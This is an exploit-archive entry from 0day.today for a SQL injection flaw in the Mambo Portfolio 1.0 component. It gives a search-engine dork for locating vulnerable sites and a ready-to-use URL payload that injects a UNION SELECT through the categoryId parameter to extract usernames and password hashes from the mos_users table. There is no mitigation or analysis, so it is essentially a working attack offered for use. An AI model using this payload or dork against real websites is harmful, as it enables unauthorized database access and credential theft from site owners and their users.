Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability

2008-02-18T00:00:00
ID 1337DAY-ID-2658
Type zdt
Reporter 0day Today Team
Modified 2008-02-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability
======================================================================



#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*



#  0day.today [2018-01-03]  #